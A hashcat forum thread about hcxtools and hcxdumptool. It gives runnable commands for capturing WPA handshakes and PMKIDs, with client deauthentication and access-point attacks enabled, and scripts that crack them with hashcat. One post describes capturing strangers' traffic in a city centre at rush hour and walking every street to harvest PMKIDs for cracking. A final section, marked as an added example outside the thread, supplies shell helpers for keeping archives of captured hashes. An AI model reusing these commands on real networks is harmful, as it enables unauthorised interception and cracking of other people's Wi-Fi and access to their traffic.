hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - Printable Version
+- hashcat Forum (https://hashcat.net/forum)
+-- Forum: Misc (https://hashcat.net/forum/forum-15.html)
+--- Forum: User Contributions (https://hashcat.net/forum/forum-25.html)
+--- Thread: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats (/thread-6661.html)
RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-04-2019

It is important to collect the -E and -I lists into an archive list!
It is important to collect PMKIDs (.16800) and EAPOLs (hccapx) into archive hash lists!
And it is important to run the .16800 archive and the hccapx archive at regular intervals against this -E -I list!

BTW: Please let me know if you got your first hit.

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - powermi - 06-04-2019

Thanks, I duplicated line 1/2 because when I saw HEX[xxxx] I suspected that it could be a PSK, but didn't know that Hashcat could process it as a possible key.
So would it make more sense to convert the output file to .2500 instead of .16800? I'll research more about the difference between both.
Seems that's a great task for a Raspberry to be listening 24/7 with hcxtools.

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-04-2019

You should do both (convert to .2500 and .16800) and run the -E and -I list on them.
But, yes, it makes more sense to run -E and -I against .2500.
It also depends on what you want. Let's run through the following "theoretical" example:
Capture as much traffic as possible in the city centre at rush hour to get PSKs from clients.
Then do a ride / walk through all the streets and get PMKIDs.
Cat all -z, -o to hash files and -E -I to a word list.
Run the word list against the hashes.
That is to say: hcxdumptool/hcxtools offers numerous application possibilities when running on a Raspberry.
See Penetration testing system 1 ... 5: https://github.com/ZerBea/hcxdumptool/wiki

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-05-2019

hcxpsktool is a powerful tool in combination with hashcat.
To improve speed on large hash files, it should be wrapped by a script:

hash mode 2500:

# split the archive hccapx into one file per ESSID (written to the current directory)
wlanhcx2ssid -i "$HOME/.....path_to your hashfile.hccapx" -e
# ESSID-named files may contain spaces, so iterate with a glob instead of an unquoted `find`
for HCXTMP in ./*.hccapx
do
[ -f "$HCXTMP" ] || continue
# number of ESSID files still to process
ls ./*.hccapx | wc -l
hcxpsktool -i "$HCXTMP" -o test.list
hashcat -m 2500 --self-test-disable --advice-disable --logfile-disable -w 3 --nonce-error-corrections=32 --potfile-path="hashcat.new.pmk" -o "hashcat.new.mac" "$HCXTMP" test.list
rm "$HCXTMP"
rm test.list
done

The same applies to hash mode 16800:

# split the archive .16800 into one file per ESSID; field 4 is the hex ESSID
# (new ':' separator as written by hcxpcaptool -k)
while IFS='' read -r line || [[ -n "$line" ]]
do
HASHNAME=$(echo "$line" | awk 'BEGIN { FS = ":" } ; { print $4 }')
[ -n "$HASHNAME" ] || continue
echo "$line" >> "$HASHNAME.16800"
done < "$HOME/.....path_to your hashfile .16800"
for HCXTMP in ./*.16800
do
[ -f "$HCXTMP" ] || continue
# number of ESSID files still to process
ls ./*.16800 | wc -l
hcxpsktool -z "$HCXTMP" > test.list
hashcat -m 16800 --self-test-disable --advice-disable --logfile-disable -w 3 --potfile-path="hashcat.new.pmk" -o "hashcat.new.mac" "$HCXTMP" test.list
rm "$HCXTMP"
rm test.list
done

A good idea is to mkdir a folder and run the scripts inside the folder.
If you have small GPU power, it is a good idea to sort | uniq "test.list" before feeding it to hashcat.

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-05-2019

hcxwltool is also a powerful tool in combination with hashcat. It is designed to run on the -E and -I output of hcxpcaptool and can be wrapped by a script, too:
In this example we also expect PSKs of length 10 digits.
hash mode 2500 (it will work on hash mode 16800, too):

# build candidate PSKs from the ESSID / identity list with several hcxwltool modes, then deduplicate
hcxwltool -i "$HOME/...path to your -E / -I list" --straight > l1.tmp
hcxwltool -i "$HOME/...path to your -E / -I list" --digit >> l1.tmp
hcxwltool -i "$HOME/...path to your -E / -I list" --digit --length=10 >> l1.tmp
hcxwltool -i "$HOME/...path to your -E / -I list" --xdigit >> l1.tmp
sort l1.tmp | uniq > test.list
rm l1.tmp
hashcat -m 2500 --self-test-disable --advice-disable --logfile-disable -w 3 --nonce-error-corrections=32 --potfile-path="hashcat.new.pmk" -o "hashcat.new.mac" "$HOME/.....path_to your hashfile.hccapx" test.list
rm test.list

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - powermi - 06-05-2019

Thanks a lot for that great info.
So, could you elaborate your full attack strategy for breaking PMKID captures in a new environment, being located just on one spot?
I'm about to purchase a Raspberry Pi just for hcxtools; better to go for a Zero or a full B3+? I wanna grab also an antenna to use it along with a TP-Link 722n.

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-05-2019

1) capture traffic:
new area:
hcxdumptool --gpio_button=4 --gpio_statusled=17 -i "$WLANDEV" -o "$ARCHIVNAME.pcapng" --poweroff --filterlist=blacklistown --filtermode=1 --give_up_ap_attacks=100000 --give_up_deauthentications=100000
discovered area:
hcxdumptool --gpio_button=4 --gpio_statusled=17 -i "$WLANDEV" -o "$ARCHIVNAME.pcapng" --poweroff --filterlist=blacklistown --filtermode=1 --disable_ap_attacks --disable_deauthentications -t 120
2) upload data to wpa-sec:
wlancap2wpasec *.pcapng
3) convert to hash files / wordlists or run wlanstrip:
hcxpcaptool -o new.hccapx -k new.16800 -E essidlist -I identitylist -U usernameliste -P pmklist -X clientlist --md5-out=hash.4800 --netntlm=hash.5500 *.*
4) pipe hcxpsktool, hcxwltool output to hashcat and run them against the hashes.
or run hcxallneu (or hcx2500neu or hcx16800neu)
5) wait until wpa-sec has finished, download cracked.txt and rkg.txt and run them against your hashes
6) loop back to 1 to capture new traffic

Attached the scripts and rules to build up a complete environment. You just need to change the path. Also you need 2 wordlists (names [namen] and month [monate]).
scripts&rules.zip (Size: 4.98 KB / Downloads: 24)

Don't wonder about the high value of nonce-error-corrections, but I have to analyze really, really ugly cap files. On hcxdumptool pcapng files you can set it to 0, 1 or 2.
Unfortunately I have no strategy to break a single network, because I'm not interested in breaking single networks. The goal is to find a weak point within the system.

BTW: A Raspberry Zero WH is the best choice. Low power consumption and small size. The onboard WiFi SoC is really, really ugly in combination with hcxdumptool.
Penetration testing systems 3, 4, 5 are line of sight (LOS) systems with extreme long range capabilities. Do not run a high power WiFi dongle - a high-gain antenna in combination with a low power dongle is much better.

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-06-2019

If you're only interested in running the Raspberry as a capture / conversion engine, I recommend installing Arch.
Do not install "K*A*L*I", because it is substantially oversized!
Attached a small howto:
how_to_Arch.zip (Size: 1.65 KB / Downloads: 9)
More help here: https://wiki.archlinux.org/index.php/installation_guide

RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - powermi - 06-06-2019

Thanks a lot for the detailed answer.
Why do you use -k instead of -z to get the .16800?
Could you describe the different arguments you execute on hcxdumptool? Some are unknown to me.
I'm thinking of using a regular Debian based distro for the Raspberry. I'll start with a model B + TP-Link 722n + 10 dB panel antenna.
RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-06-2019

-z old hashcat separator * (also used by JtR)
-k new hashcat separator :
hashcat accepts both, because it has a built-in fallback to the old format. The new one is used in potfile and outfile by hashcat.

Some tests (hcxdumptool -i interface --do_rcascan + 10 dBi panel antenna):

TP-LINK TL-WN722N v1
ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n
INFO: cha=6, rx=8476, rx(dropped)=0, tx=250, err=0, aps=29 (19 in range)

TP-LINK Archer T2UH
ID 148f:761a Ralink Technology, Corp. MT7610U ("Archer T2U" 2.4G+5G WLAN Adapter)
INFO: cha=4, rx=5897, rx(dropped)=0, tx=225, err=0, aps=40 (24 in range)

TENDA W311U+
INFO: cha=11, rx=4937, rx(dropped)=0, tx=224, err=0, aps=48 (20 in range)

ALFA AWUS036H
ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
INFO: cha=6, rx=1699, rx(dropped)=0, tx=113, err=0, aps=33 (19 in range)

Unfortunately some other devices are not working (any longer) due to a kernel issue (not fixed yet): https://bugzilla.kernel.org/show_bug.cgi?id=202541
BTW: Only the TP-Link TL-WN722N v1 is working as expected: https://wikidevi.com/wiki/TP-LINK_TL-WN722N_v1.x
A panel is a good choice (TP-Link TL-ANT2414A and TL-ANT2409A work fine).
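As an added example that is not part of this thread and not hcxtools code, the POSIX shell functions below illustrate two points from the posts above: the archive lists ZerBea recommends early in the thread (merging fresh -E/-I output or fresh hash lines into a deduplicated archive) and the difference between the old '*' separator (-z) and the new ':' separator (-k) of 16800 lines. The example assumes the line layout the thread describes, PMKID, MAC_AP, MAC_STA and a hex-encoded ESSID; the function names, the constructed sample hash line and the ASCII-only ESSID decoder are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not hcxtools code. Assumes the hashcat -m 16800 line layout the
# thread describes: PMKID, MAC_AP, MAC_STA and hex-encoded ESSID, joined by '*'
# (hcxpcaptool -z) or ':' (hcxpcaptool -k). Function names are this example's own.

# split_16800 LINE : print the four fields one per line (separator may be '*' or ':');
# exit status 1 if the line is not a well-formed 16800 hash line.
split_16800() {
    printf '%s\n' "$1" | awk -F'[*:]' '
        function ishex(s, n) { return (length(s) == n && s ~ /^[0-9a-fA-F]+$/) }
        NF != 4 { exit 1 }
        !ishex($1, 32) || !ishex($2, 12) || !ishex($3, 12) { exit 1 }
        # ESSID is 1..32 bytes, hex encoded: even length, at most 64 hex digits
        $4 !~ /^[0-9a-fA-F]+$/ || length($4) % 2 != 0 || length($4) > 64 { exit 1 }
        { print $1; print $2; print $3; print $4 }'
}

# to_k LINE : rewrite LINE in the new ':' separated form with lower-case hex,
# the form hashcat itself writes to potfile and outfile.
to_k() {
    _f=$(split_16800 "$1") || return 1
    [ -n "$_f" ] || return 1
    printf '%s\n' "$_f" | paste -s -d ':' - | tr 'A-F' 'a-f'
}

# essid_of LINE : decode the hex ESSID field to text (ASCII ESSIDs assumed),
# i.e. the value an -E list would carry for this network.
essid_of() {
    _f=$(split_16800 "$1") || return 1
    [ -n "$_f" ] || return 1
    printf '%s\n' "$_f" | sed -n '4p' | awk '{
        h = "0123456789abcdef"; s = tolower($0); out = ""
        for (i = 1; i <= length(s); i += 2)
            out = out sprintf("%c", (index(h, substr(s, i, 1)) - 1) * 16 + index(h, substr(s, i + 1, 1)) - 1)
        print out }'
}

# add_to_archive LIST NEW : merge the lines of NEW into LIST, keeping LIST sorted
# and unique (an archive -E/-I list or archive hash list), and print how many
# new lines LIST gained.
add_to_archive() {
    [ -f "$1" ] || : > "$1"
    _before=$(( $(wc -l < "$1") ))
    sort -u -o "$1" "$1" "$2"
    _after=$(( $(wc -l < "$1") ))
    echo $(( _after - _before ))
}

# Demo on constructed data: one '*' separated hash line (ESSID "TestNet"),
# seen twice in a fresh capture, merged into empty archives.
demo() {
    _d=$(mktemp -d) || return 1
    _line='00112233445566778899aabbccddeeff*aabbccddeeff*112233445566*546573744e6574'
    to_k "$_line" > "$_d/new.16800"
    to_k "$_line" >> "$_d/new.16800"
    essid_of "$_line" > "$_d/new.essid"
    echo "archive gained $(add_to_archive "$_d/archive.16800" "$_d/new.16800") hash line(s)"
    echo "archive gained $(add_to_archive "$_d/archive.essid" "$_d/new.essid") ESSID(s)"
    rm -rf "$_d"
}
demo
```

Run the file directly to see the demo, or source it to use the functions on real lists. Validating each line before it is appended keeps a truncated or mis-separated line from silently polluting an archive hash list, which is the kind of line that otherwise shows up much later as a hashcat parse error on the whole archive.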